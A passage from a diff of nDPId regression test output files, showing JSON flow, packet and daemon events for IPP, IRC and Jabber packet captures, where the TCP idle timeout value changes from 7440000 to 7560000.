00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":279,"packets-processed":277,"total-skipped-flows":0,"total-l4-data-len":230224,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1210953939492}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 279/277

12
test/results/irc.pcap.out
View File

@@ -1,11 +1,11 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"irc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1387554241634}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387554241634,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387554241634,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"}
00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387554241634,"flow_last_seen":1387554241634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387554241634,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"}
00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":29,"total-skipped-flows":0,"total-l4-data-len":7015,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387554256201}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 29/29

12
test/results/jabber.pcap.out
View File

@@ -1,11 +1,11 @@
00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"jabber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1504181789350}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"}
00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}}
00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"}
00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}}
00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}}
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":157,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1504181789418}
